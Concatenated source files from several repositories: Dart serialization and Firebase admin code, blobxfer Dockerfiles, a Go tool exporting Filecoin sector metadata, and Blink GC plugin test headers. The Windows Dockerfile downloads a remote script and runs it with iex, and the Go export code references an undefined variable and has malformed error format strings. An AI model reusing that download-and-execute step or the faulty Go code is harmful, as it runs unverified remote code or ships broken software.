return ListsHost(
vbools: List<bool>.unmodifiable(map['vbools']),
nvbools: map['nvbools'] == null
? null
: List<bool>.unmodifiable(map['nvbools']),
vstrings: List<String>.unmodifiable(map['vstrings']),
nvstrings: map['nvstrings'] == null
? null
: List<String>.unmodifiable(map['nvstrings']),
vdurations: List<Duration>.unmodifiable(map['vdurations']),
nvdurations: map['nvdurations'] == null
? null
: List<Duration>.unmodifiable(map['nvdurations']),
vdatetimes: List<DateTime>.unmodifiable(map['vdatetimes']),
nvdatetimes: map['nvdatetimes'] == null
? null
: List<DateTime>.unmodifiable(map['nvdatetimes']),
vdecimals: List<Decimal>.unmodifiable(map['vdecimals']),
nvdecimals: map['nvdecimals'] == null
? null
: List<Decimal>.unmodifiable(map['nvdecimals']),
vints: List<int>.unmodifiable(map['vints']),
nvints:
map['nvints'] == null ? null : List<int>.unmodifiable(map['nvints']),
vdoubles: List<double>.unmodifiable(map['vdoubles']),
nvdoubles: map['nvdoubles'] == null
? null
: List<double>.unmodifiable(map['nvdoubles']),
vapplianceTypes: List<ApplianceType>.unmodifiable(map['vapplianceTypes']
.map((e) => const $ApplianceTypeMapMapper().fromMap(e))),
nvapplianceTypes: map['nvapplianceTypes'] == null
? null
: List<ApplianceType>.unmodifiable(map['nvapplianceTypes']
.map((e) => const $ApplianceTypeMapMapper().fromMap(e))),
);
}
@override
Map<String, dynamic> toMap(ListsHost instance) {
final map = <String, dynamic>{};
map['vbools'] = instance.vbools;
map['nvbools'] = instance.nvbools;
map['vstrings'] = instance.vstrings;
map['nvstrings'] = instance.nvstrings;
map['vdurations'] = instance.vdurations;
map['nvdurations'] = instance.nvdurations;
map['vdatetimes'] = instance.vdatetimes;
map['nvdatetimes'] = instance.nvdatetimes;
map['vdecimals'] = instance.vdecimals;
map['nvdecimals'] = instance.nvdecimals;
map['vints'] = instance.vints;
map['nvints'] = instance.nvints;
map['vdoubles'] = instance.vdoubles;
map['nvdoubles'] = instance.nvdoubles;
map['vapplianceTypes'] = instance.vapplianceTypes
.map((e) => const $ApplianceTypeMapMapper().toMap(e))
.toList();
map['nvapplianceTypes'] = instance.nvapplianceTypes == null
? null
: instance.nvapplianceTypes!
.map((e) => const $ApplianceTypeMapMapper().toMap(e))
.toList();
return map;
}
}
extension $ListsHostMapExtension on ListsHost {
Map<String, dynamic> toMap() => const $ListsHostMapMapper().toMap(this);
static ListsHost fromMap(Map<String, dynamic> map) =>
const $ListsHostMapMapper().fromMap(map);
}
extension $MapListsHostExtension on Map<String, dynamic> {
ListsHost toListsHost() => const $ListsHostMapMapper().fromMap(this);
}
class $ListsHostFieldNames {
final String fieldName;
final String prefix;
$ListsHostFieldNames.sub(this.fieldName) : prefix = fieldName + '.';
const $ListsHostFieldNames()
: fieldName = '',
prefix = '';
static const _vbools = 'vbools';
String get vbools => prefix + _vbools;
static const _nvbools = 'nvbools';
String get nvbools => prefix + _nvbools;
static const _vstrings = 'vstrings';
String get vstrings => prefix + _vstrings;
static const _nvstrings = 'nvstrings';
String get nvstrings => prefix + _nvstrings;
static const _vdurations = 'vdurations';
String get vdurations => prefix + _vdurations;
static const _nvdurations = 'nvdurations';
String get nvdurations => prefix + _nvdurations;
static const _vdatetimes = 'vdatetimes';
String get vdatetimes => prefix + _vdatetimes;
static const _nvdatetimes = 'nvdatetimes';
String get nvdatetimes => prefix + _nvdatetimes;
static const _vdecimals = 'vdecimals';
String get vdecimals => prefix + _vdecimals;
static const _nvdecimals = 'nvdecimals';
String get nvdecimals => prefix + _nvdecimals;
static const _vints = 'vints';
String get vints => prefix + _vints;
static const _nvints = 'nvints';
String get nvints => prefix + _nvints;
static const _vdoubles = 'vdoubles';
String get vdoubles => prefix + _vdoubles;
static const _nvdoubles = 'nvdoubles';
String get nvdoubles => prefix + _nvdoubles;
static const _vapplianceTypes = 'vapplianceTypes';
String get vapplianceTypes => prefix + _vapplianceTypes;
static const _nvapplianceTypes = 'nvapplianceTypes';
String get nvapplianceTypes => prefix + _nvapplianceTypes;
@override
String toString() => fieldName;
}
<|start_filename|>firebase-auth-admin/lib/src/firebase_user_info.dart<|end_filename|>
class FirebaseUserInfo {
final String? email;
final bool? emailVerified;
final String? displayName;
final String? password;
final bool? disabled;
final String? phoneNumber;
final String? photoUrl;
const FirebaseUserInfo({
this.email,
this.emailVerified,
this.displayName,
this.password,
this.disabled,
this.phoneNumber,
this.photoUrl,
});
FirebaseUserInfo copyWith({
String? email,
bool? emailVerified,
String? displayName,
String? password,
bool? disabled,
String? phoneNumber,
String? photoUrl,
}) {
return FirebaseUserInfo(
email: email ?? this.email,
emailVerified: emailVerified ?? this.emailVerified,
displayName: displayName ?? this.displayName,
password: password ?? this.password,
disabled: disabled ?? this.disabled,
phoneNumber: phoneNumber ?? this.phoneNumber,
photoUrl: photoUrl ?? this.photoUrl,
);
}
}
<|start_filename|>arango_driver/lib/src/collection_criteria.dart<|end_filename|>
import 'package:arango_driver/arango_driver.dart';
class CollectionCriteria {
final String name;
final bool waitForSync;
final CollectionType collectionType;
const CollectionCriteria(
this.name, {
this.waitForSync = false,
this.collectionType = CollectionType.document,
});
const CollectionCriteria.namedArgs({
required this.name,
this.waitForSync = false,
this.collectionType = CollectionType.document,
});
}
<|start_filename|>firebase-auth-admin/bin/command.dart<|end_filename|>
import 'package:args/args.dart';
import 'common_options.dart';
import 'get_custom_claims_command.dart';
import 'set_custom_claims_command.dart';
export 'set_custom_claims_command.dart';
export 'get_custom_claims_command.dart';
class Command {
final CommonOptions commonOptions;
Command(this.commonOptions);
static Command? getCommand(List<String> args) {
final parser = ArgParser();
_prepare(parser);
final command = _parse(parser, args);
return command;
}
static Command? _parse(ArgParser parser, List<String> args) {
try {
var results = parser.parse(args);
if (results['help']) {
_showHelp(parser);
return null;
}
final pk = results['private-key'];
final co = CommonOptions(privateKey: pk);
final command = results.command;
if (command == null) {
_showHelp(parser);
return null;
}
switch (command.name) {
case 'getCustomClaims':
return GetCustomClaimsCommand.fromResults(co, command);
case 'setCustomClaims':
return SetCustomClaimsCommand.fromResults(co, command);
default:
_showHelp(parser);
return null;
}
} catch (_) {
_showHelp(parser);
return null;
}
}
static void _prepare(ArgParser parser) {
parser.addFlag(
'help',
abbr: 'h',
help: 'Display this help',
);
parser.addOption('private-key',
abbr: 'p',
defaultsTo: 'service-account.json',
help: 'Path to the services private key file.');
SetCustomClaimsCommand.addCommand(parser);
GetCustomClaimsCommand.addCommand(parser);
}
}
void _showHelp(ArgParser parser) {
print('Usage: firebase-auth [-h][-p] <commands>');
print(parser.usage);
print('');
print('Available commands:');
for (final cpKey in parser.commands.keys) {
print(' - $cpKey');
}
print('');
for (final cpKey in parser.commands.keys) {
final commandParser = parser.commands[cpKey];
if (commandParser == null) continue;
print('');
print('$cpKey usage:');
print(commandParser.usage);
}
}
<|start_filename|>firebase-auth-admin/lib/firebase_auth_admin.dart<|end_filename|>
/// Administration utilities for Firebase Authentication: creating and
/// updating users, managing custom claims and tokens, and reporting
/// admin errors.
library firebase_auth_admin;
export 'src/firebase_auth_admin.dart';
export 'src/firebase_create_user.dart';
export 'src/firebase_update_user.dart';
export 'src/firebase_user_info.dart';
export 'src/firebase_admin_exception.dart';
export 'src/firebase_token.dart';
<|start_filename|>proto_mapper/proto_generator/lib/src/proto_mapper/field_code_generators/bool_field_code_generator.dart<|end_filename|>
import '../field_code_generator.dart';
import '../field_descriptor.dart';
class BoolFieldCodeGenerator extends FieldCodeGenerator {
BoolFieldCodeGenerator(
FieldDescriptor fieldDescriptor, {
String refName = FieldCodeGenerator.defaultRefName,
String protoRefName = FieldCodeGenerator.defaultProtoRefName,
}) : super(
fieldDescriptor,
refName: refName,
protoRefName: protoRefName,
);
}
<|start_filename|>firebase-auth-admin/go/build.bat<|end_filename|>
go build -buildmode=c-shared -o lib-auth.dll auth.go
<|start_filename|>grpc_host/lib/src/configuration/configuration.dart<|end_filename|>
export 'file_yaml_extension.dart';
export 'host_settings.dart';
export 'smtp_settings.dart';
export 'token_settings.dart';
export 'settings.dart';
<|start_filename|>entity_adapter/example/lib/grpc/asset.pb.dart<|end_filename|>
///
// Generated code. Do not modify.
// source: asset.proto
//
// @dart = 2.12
// ignore_for_file: annotate_overrides,camel_case_types,unnecessary_const,non_constant_identifier_names,library_prefixes,unused_import,unused_shown_name,return_of_invalid_type,unnecessary_this,prefer_final_fields
import 'dart:core' as $core;
import 'package:protobuf/protobuf.dart' as $pb;
class GAsset extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GAsset',
createEmptyInstance: create)
..aOS(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'description')
..aOS(
2,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'value')
..hasRequiredFields = false;
GAsset._() : super();
factory GAsset({
$core.String? description,
$core.String? value,
}) {
final _result = create();
if (description != null) {
_result.description = description;
}
if (value != null) {
_result.value = value;
}
return _result;
}
factory GAsset.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GAsset.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GAsset clone() => GAsset()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GAsset copyWith(void Function(GAsset) updates) =>
super.copyWith((message) => updates(message as GAsset))
as GAsset; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GAsset create() => GAsset._();
GAsset createEmptyInstance() => create();
static $pb.PbList<GAsset> createRepeated() => $pb.PbList<GAsset>();
@$core.pragma('dart2js:noInline')
static GAsset getDefault() =>
_defaultInstance ??= $pb.GeneratedMessage.$_defaultFor<GAsset>(create);
static GAsset? _defaultInstance;
@$pb.TagNumber(1)
$core.String get description => $_getSZ(0);
@$pb.TagNumber(1)
set description($core.String v) {
$_setString(0, v);
}
@$pb.TagNumber(1)
$core.bool hasDescription() => $_has(0);
@$pb.TagNumber(1)
void clearDescription() => clearField(1);
@$pb.TagNumber(2)
$core.String get value => $_getSZ(1);
@$pb.TagNumber(2)
set value($core.String v) {
$_setString(1, v);
}
@$pb.TagNumber(2)
$core.bool hasValue() => $_has(1);
@$pb.TagNumber(2)
void clearValue() => clearField(2);
}
class GListOfAsset extends $pb.GeneratedMessage {
static final $pb.BuilderInfo _i = $pb.BuilderInfo(
const $core.bool.fromEnvironment('protobuf.omit_message_names')
? ''
: 'GListOfAsset',
createEmptyInstance: create)
..pc<GAsset>(
1,
const $core.bool.fromEnvironment('protobuf.omit_field_names')
? ''
: 'items',
$pb.PbFieldType.PM,
subBuilder: GAsset.create)
..hasRequiredFields = false;
GListOfAsset._() : super();
factory GListOfAsset({
$core.Iterable<GAsset>? items,
}) {
final _result = create();
if (items != null) {
_result.items.addAll(items);
}
return _result;
}
factory GListOfAsset.fromBuffer($core.List<$core.int> i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromBuffer(i, r);
factory GListOfAsset.fromJson($core.String i,
[$pb.ExtensionRegistry r = $pb.ExtensionRegistry.EMPTY]) =>
create()..mergeFromJson(i, r);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.deepCopy] instead. '
'Will be removed in next major version')
GListOfAsset clone() => GListOfAsset()..mergeFromMessage(this);
@$core.Deprecated('Using this can add significant overhead to your binary. '
'Use [GeneratedMessageGenericExtensions.rebuild] instead. '
'Will be removed in next major version')
GListOfAsset copyWith(void Function(GListOfAsset) updates) =>
super.copyWith((message) => updates(message as GListOfAsset))
as GListOfAsset; // ignore: deprecated_member_use
$pb.BuilderInfo get info_ => _i;
@$core.pragma('dart2js:noInline')
static GListOfAsset create() => GListOfAsset._();
GListOfAsset createEmptyInstance() => create();
static $pb.PbList<GListOfAsset> createRepeated() =>
$pb.PbList<GListOfAsset>();
@$core.pragma('dart2js:noInline')
static GListOfAsset getDefault() => _defaultInstance ??=
$pb.GeneratedMessage.$_defaultFor<GListOfAsset>(create);
static GListOfAsset? _defaultInstance;
@$pb.TagNumber(1)
$core.List<GAsset> get items => $_getList(0);
}
<|start_filename|>proto_mapper/test/lib/src/calc_result.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'calc_result.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $CalcResultProtoMapper implements ProtoMapper<CalcResult, GCalcResult> {
const $CalcResultProtoMapper();
@override
CalcResult fromProto(GCalcResult proto) => _$CalcResultFromProto(proto);
@override
GCalcResult toProto(CalcResult entity) => _$CalcResultToProto(entity);
CalcResult fromJson(String json) =>
_$CalcResultFromProto(GCalcResult.fromJson(json));
String toJson(CalcResult entity) => _$CalcResultToProto(entity).writeToJson();
String toBase64Proto(CalcResult entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
CalcResult fromBase64Proto(String base64Proto) =>
GCalcResult.fromJson(utf8.decode(base64Decode(base64Proto)))
.toCalcResult();
}
GCalcResult _$CalcResultToProto(CalcResult instance) {
var proto = GCalcResult();
proto.result = instance.result;
return proto;
}
CalcResult _$CalcResultFromProto(GCalcResult instance) => CalcResult(
result: instance.result,
);
extension $CalcResultProtoExtension on CalcResult {
GCalcResult toProto() => _$CalcResultToProto(this);
String toJson() => _$CalcResultToProto(this).writeToJson();
static CalcResult fromProto(GCalcResult proto) =>
_$CalcResultFromProto(proto);
static CalcResult fromJson(String json) =>
_$CalcResultFromProto(GCalcResult.fromJson(json));
}
extension $GCalcResultProtoExtension on GCalcResult {
CalcResult toCalcResult() => _$CalcResultFromProto(this);
}
<|start_filename|>arango_driver/lib/src/index_criteria.dart<|end_filename|>
class IndexCriteria {
final String collectionName;
final String indexName;
final Iterable<String> fieldNames;
final bool unique;
final bool deduplicate;
final bool sparse;
final bool inBackground;
const IndexCriteria(
this.collectionName,
this.indexName,
this.fieldNames, [
this.unique = false,
this.deduplicate = false,
this.sparse = false,
this.inBackground = false,
]);
const IndexCriteria.namedArgs({
required this.collectionName,
required this.indexName,
required this.fieldNames,
this.unique = false,
this.deduplicate = false,
this.sparse = false,
this.inBackground = false,
});
}
<|start_filename|>grpc_host/lib/src/security/principal.dart<|end_filename|>
import 'package:grpc/grpc.dart';
import 'package:nosql_repository/nosql_repository.dart';
class Principal implements DbPrincipal {
@override
final String userKey;
@override
final String tenantKey;
final Set<String> permissions;
final bool isAuthenticated;
final bool isAdministrator;
const Principal({
required this.userKey,
required this.tenantKey,
required this.permissions,
required this.isAdministrator,
this.isAuthenticated = false,
});
const Principal.unauthenticated()
: userKey = '',
tenantKey = '',
isAuthenticated = false,
isAdministrator = false,
permissions = const {};
@override
bool hasPermission(String permission) {
if (isAdministrator || permission == '') {
return true;
}
var hasPermission = permissions.contains(permission);
return hasPermission;
}
void throwIfUnauthenticated() {
if (!isAuthenticated) {
throw GrpcError.unauthenticated();
}
}
}
<|start_filename|>proto_mapper/test/lib/src/empty.g.dart<|end_filename|>
// GENERATED CODE - DO NOT MODIFY BY HAND
part of 'empty.dart';
// **************************************************************************
// ProtoMapperGenerator
// **************************************************************************
class $EmptyProtoMapper implements ProtoMapper<Empty, GEmpty> {
const $EmptyProtoMapper();
@override
Empty fromProto(GEmpty proto) => _$EmptyFromProto(proto);
@override
GEmpty toProto(Empty entity) => _$EmptyToProto(entity);
Empty fromJson(String json) => _$EmptyFromProto(GEmpty.fromJson(json));
String toJson(Empty entity) => _$EmptyToProto(entity).writeToJson();
String toBase64Proto(Empty entity) =>
base64Encode(utf8.encode(entity.toProto().writeToJson()));
Empty fromBase64Proto(String base64Proto) =>
GEmpty.fromJson(utf8.decode(base64Decode(base64Proto))).toEmpty();
}
GEmpty _$EmptyToProto(Empty instance) {
var proto = GEmpty();
return proto;
}
Empty _$EmptyFromProto(GEmpty instance) => Empty();
extension $EmptyProtoExtension on Empty {
GEmpty toProto() => _$EmptyToProto(this);
String toJson() => _$EmptyToProto(this).writeToJson();
static Empty fromProto(GEmpty proto) => _$EmptyFromProto(proto);
static Empty fromJson(String json) => _$EmptyFromProto(GEmpty.fromJson(json));
}
extension $GEmptyProtoExtension on GEmpty {
Empty toEmpty() => _$EmptyFromProto(this);
}
| BenVercammen/dart_framework |
<|start_filename|>docker/win/Dockerfile<|end_filename|>
# Dockerfile for Azure/blobxfer (Windows)
FROM python:3.9.7-windowsservercore-1809
MAINTAINER <NAME> <https://github.com/Azure/blobxfer>
ENV chocolateyUseWindowsCompression false
RUN [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; \
iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) ; \
choco install --no-progress -y git -params "/GitAndUnixToolsOnPath"
ARG GIT_BRANCH
ARG GIT_COMMIT
WORKDIR C:\\blobxfer
RUN git clone -b $Env:GIT_BRANCH --single-branch --depth 5 https://github.com/Azure/blobxfer.git C:\blobxfer ; \
git checkout $Env:GIT_COMMIT ; \
pip install --no-cache-dir -e . ; \
python setup.py install
RUN python -m compileall C:\Python\Lib\site-packages ; \
exit 0
FROM mcr.microsoft.com/windows/nanoserver:1809
COPY --from=0 /Python /Python
COPY --from=0 /blobxfer/THIRD_PARTY_NOTICES.txt /BLOBXFER_THIRD_PARTY_NOTICES.txt
COPY --from=0 /blobxfer/LICENSE /BLOBXFER_LICENSE.txt
SHELL ["powershell", "-Command", "$ErrorActionPreference = 'Stop'; $ProgressPreference = 'SilentlyContinue';"]
ENTRYPOINT ["blobxfer"]
<|start_filename|>docker/linux/Dockerfile<|end_filename|>
# Dockerfile for Azure/blobxfer (Linux)
FROM python:3.9.7-alpine3.14
MAINTAINER <NAME> <https://github.com/Azure/blobxfer>
ARG GIT_BRANCH
ARG GIT_COMMIT
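# A typical build invocation (branch and commit values are illustrative):
#   docker build --build-arg GIT_BRANCH=master --build-arg GIT_COMMIT=HEAD -t blobxfer .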
RUN apk update \
&& apk add --update --no-cache \
musl build-base openssl-dev libffi-dev rust cargo ca-certificates git \
&& python3 -m ensurepip --upgrade \
&& pip3 install --no-cache-dir --upgrade pip setuptools setuptools-rust wheel \
&& git clone -b $GIT_BRANCH --single-branch --depth 5 https://github.com/Azure/blobxfer.git /blobxfer \
&& cd /blobxfer \
&& git checkout $GIT_COMMIT \
&& pip3 install --no-cache-dir -e . \
&& python3 setup.py install \
&& cp THIRD_PARTY_NOTICES.txt /BLOBXFER_THIRD_PARTY_NOTICES.txt \
&& cp LICENSE /BLOBXFER_LICENSE.txt \
&& pip3 uninstall -y setuptools-rust wheel \
&& apk del --purge build-base patch openssl-dev libffi-dev rust cargo git \
&& rm /var/cache/apk/* \
&& rm -rf /root/.cache /root/.cargo \
&& rm -rf /blobxfer
ENTRYPOINT ["blobxfer"]
| Azure/blobxfer |
<|start_filename|>export/export.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package export
import (
"encoding/json"
"fmt"
"github.com/filecoin-project/go-address"
"github.com/filecoin-project/go-state-types/abi"
"github.com/filecoin-project/lotus/chain/types"
cliutil "github.com/filecoin-project/lotus/cli/util"
"github.com/ipfs/go-cid"
logging "github.com/ipfs/go-log/v2"
"github.com/mitchellh/go-homedir"
"github.com/urfave/cli/v2"
"golang.org/x/xerrors"
"io/ioutil"
"strconv"
"time"
)
var log = logging.Logger("export")
var ExportsCmd = &cli.Command{
Name: "export",
Usage: "Export sector metadata",
ArgsUsage: "[sectorNum1 sectorNum2 ...]",
Flags: []cli.Flag{
&cli.StringFlag{
Name: "miner",
Usage: "Filecoin Miner. Such as: f01000",
Required: true,
},
},
Action: func(cctx *cli.Context) error {
ctx := cliutil.ReqContext(cctx)
start := time.Now()
if cctx.Args().Len() < 1 {
return fmt.Errorf("at least one sector must be specified")
}
runSectors := make([]uint64, 0)
for _, sn := range cctx.Args().Slice() {
sectorNum, err := strconv.ParseUint(sn, 10, 64)
if err != nil {
return fmt.Errorf("could not parse sector number: %w", err)
}
runSectors = append(runSectors, sectorNum)
}
maddr, err := address.NewFromString(cctx.String("miner"))
if err != nil {
return xerrors.Errorf("Getting NewFromString err:", err)
}
fullNodeApi, closer, err := cliutil.GetFullNodeAPI(cctx)
if err != nil {
return xerrors.Errorf("Getting FullNodeAPI err:", err)
}
defer closer()
//Sector size
mi, err := fullNodeApi.StateMinerInfo(ctx, maddr, types.EmptyTSK)
if err != nil {
return xerrors.Errorf("Getting StateMinerInfo err:", err)
}
output := &RecoveryParams{
Miner: maddr,
SectorSize: mi.SectorSize,
}
sectorInfos := make(SectorInfos, 0)
failedSectors := make([]uint64, 0)
for _, sector := range runSectors {
ts, sectorPreCommitOnChainInfo, err := GetSectorCommitInfoOnChain(ctx, fullNodeApi, maddr, abi.SectorNumber(sector))
if err != nil {
log.Errorf("Getting sector (%d) precommit info error: %v ", sector, err)
continue
}
si := &SectorInfo{
SectorNumber: abi.SectorNumber(sector),
SealProof: sectorPreCommitOnChainInfo.Info.SealProof,
SealedCID: sectorPreCommitOnChainInfo.Info.SealedCID,
}
ticket, err := GetSectorTicketOnChain(ctx, fullNodeApi, maddr, ts, sectorPreCommitOnChainInfo)
if err != nil {
log.Errorf("Getting sector (%d) ticket error: %v ", sector, err)
continue
}
si.Ticket = ticket
sectorInfos = append(sectorInfos, si)
output.SectorInfos = sectorInfos
out, err := json.MarshalIndent(output, "", "\t")
if err != nil {
return err
}
of, err := homedir.Expand("sectors-recovery-" + maddr.String() + ".json")
if err != nil {
return err
}
if err := ioutil.WriteFile(of, out, 0644); err != nil {
return err
}
}
end := time.Now()
fmt.Println("export", len(sectorInfos), "sectors, failt sectors:", failtSectors, ", elapsed:", end.Sub(start))
return nil
},
}
type RecoveryParams struct {
Miner address.Address
SectorSize abi.SectorSize
SectorInfos SectorInfos
}
type SectorInfo struct {
SectorNumber abi.SectorNumber
Ticket abi.Randomness
SealProof abi.RegisteredSealProof
SealedCID cid.Cid
}
type SectorInfos []*SectorInfo
func (t SectorInfos) Len() int { return len(t) }
func (t SectorInfos) Swap(i, j int) { t[i], t[j] = t[j], t[i] }
func (t SectorInfos) Less(i, j int) bool {
return t[i].SectorNumber < t[j].SectorNumber
}
<|start_filename|>main.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package main
import (
"github.com/froghub-io/filecoin-sealer-recover/export"
"github.com/froghub-io/filecoin-sealer-recover/recovery"
logging "github.com/ipfs/go-log/v2"
"github.com/urfave/cli/v2"
"os"
)
var log = logging.Logger("sealer-recover-main")
func main() {
logging.SetLogLevel("*", "INFO")
app := &cli.App{
Name: "sealer-recovery",
Usage: "Filecoin sealer recovery",
Version: BuildVersion,
Commands: []*cli.Command{
recovery.RecoverCmd,
export.ExportsCmd,
},
}
if err := app.Run(os.Args); err != nil {
log.Warnf("%+v", err)
return
}
}
// BuildVersion is the local build version
const BuildVersion = "1.1.0"
<|start_filename|>export/chain.go<|end_filename|>
/*
* Copyright (C) 2022 FrogHub
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package export
import (
"bytes"
"context"
"github.com/filecoin-project/go-address"
"github.com/filecoin-project/go-state-types/abi"
"github.com/filecoin-project/go-state-types/crypto"
"github.com/filecoin-project/lotus/api/v0api"
"github.com/filecoin-project/lotus/chain/actors/builtin/miner"
"github.com/filecoin-project/lotus/chain/types"
"golang.org/x/xerrors"
)
func GetSectorTicketOnChain(ctx context.Context, fullNodeApi v0api.FullNode, maddr address.Address, ts *types.TipSet, preCommitInfo *miner.SectorPreCommitOnChainInfo) (abi.Randomness, error) {
buf := new(bytes.Buffer)
if err := maddr.MarshalCBOR(buf); err != nil {
return nil, xerrors.Errorf("Address MarshalCBOR err:", err)
}
ticket, err := fullNodeApi.StateGetRandomnessFromTickets(ctx, crypto.DomainSeparationTag_SealRandomness, preCommitInfo.Info.SealRandEpoch, buf.Bytes(), ts.Key())
if err != nil {
return nil, xerrors.Errorf("Getting Randomness err:", err)
}
return ticket, err
}
func GetSectorCommitInfoOnChain(ctx context.Context, fullNodeApi v0api.FullNode, maddr address.Address, sid abi.SectorNumber) (*types.TipSet, *miner.SectorPreCommitOnChainInfo, error) {
si, err := fullNodeApi.StateSectorGetInfo(ctx, maddr, sid, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if si == nil {
//Provecommit not submitted
preCommitInfo, err := fullNodeApi.StateSectorPreCommitInfo(ctx, maddr, sid, types.EmptyTSK)
if err != nil {
return nil, nil, xerrors.Errorf("Getting sector PreCommit info err:", err)
}
ts, err := fullNodeApi.ChainGetTipSetByHeight(ctx, preCommitInfo.PreCommitEpoch, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if ts == nil {
return nil, nil, xerrors.Errorf("Height(%d) Tipset Not Found")
}
return ts, &preCommitInfo, err
}
ts, err := fullNodeApi.ChainGetTipSetByHeight(ctx, si.Activation, types.EmptyTSK)
if err != nil {
return nil, nil, err
}
if ts == nil {
return nil, nil, xerrors.Errorf("Height(%d) Tipset Not Found", si.Activation)
}
preCommitInfo, err := fullNodeApi.StateSectorPreCommitInfo(ctx, maddr, sid, ts.Key())
if err != nil {
return nil, nil, xerrors.Errorf("Getting sector PreCommit info err:", err)
}
return ts, &preCommitInfo, err
}
| czlree/filecoin-sealer-recover |
<|start_filename|>tools/clang/blink_gc_plugin/tests/traceimpl_error.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef TRACEIMPL_ERROR_H_
#define TRACEIMPL_ERROR_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
virtual void Trace(Visitor*) {}
};
class TraceImplInlinedWithUntracedMember
: public GarbageCollected<TraceImplInlinedWithUntracedMember> {
public:
void Trace(Visitor* visitor) {
// Empty; should get complaints from the plugin for untraced x_.
}
private:
Member<X> x_;
};
class TraceImplExternWithUntracedMember
: public GarbageCollected<TraceImplExternWithUntracedMember> {
public:
void Trace(Visitor* visitor);
private:
Member<X> x_;
};
class Base : public GarbageCollected<Base> {
public:
virtual void Trace(Visitor*) {}
};
class TraceImplInlineWithUntracedBase : public Base {
public:
void Trace(Visitor* visitor) override {
// Empty; should get complaints from the plugin for untraced Base.
}
};
class TraceImplExternWithUntracedBase : public Base {
public:
void Trace(Visitor*) override;
};
}
#endif // TRACEIMPL_ERROR_H_
<|start_filename|>tools/clang/blink_gc_plugin/tests/register_weak_members_template.h<|end_filename|>
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef REGISTER_WEAK_MEMBERS_TEMPLATE_H_
#define REGISTER_WEAK_MEMBERS_TEMPLATE_H_
#include "heap/stubs.h"
namespace blink {
class X : public GarbageCollected<X> {
public:
void Trace(Visitor* visitor) {}
};
class HasUntracedWeakMembers : public GarbageCollected<HasUntracedWeakMembers> {
public:
void Trace(Visitor* visitor) {
visitor->template RegisterWeakMembers<
HasUntracedWeakMembers, &HasUntracedWeakMembers::ClearWeakMembers>(
this);
}
void ClearWeakMembers(Visitor* visitor);
private:
WeakMember<X> x_;
};
}
#endif // REGISTER_WEAK_MEMBERS_TEMPLATE_H_
<|start_filename|>tools/clang/blink_gc_plugin/Edge.cpp<|end_filename|>
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "Config.h"
#include "Edge.h"
#include "RecordInfo.h"
TracingStatus Value::NeedsTracing(NeedsTracingOption option) {
return value_->NeedsTracing(option);
}
bool Value::NeedsFinalization() { return value_->NeedsFinalization(); }
bool Collection::NeedsFinalization() { return info_->NeedsFinalization(); }
void RecursiveEdgeVisitor::AtValue(Value*) {}
void RecursiveEdgeVisitor::AtRawPtr(RawPtr*) {}
void RecursiveEdgeVisitor::AtRefPtr(RefPtr*) {}
void RecursiveEdgeVisitor::AtUniquePtr(UniquePtr*) {}
void RecursiveEdgeVisitor::AtMember(Member*) {}
void RecursiveEdgeVisitor::AtWeakMember(WeakMember*) {}
void RecursiveEdgeVisitor::AtPersistent(Persistent*) {}
void RecursiveEdgeVisitor::AtCrossThreadPersistent(CrossThreadPersistent*) {}
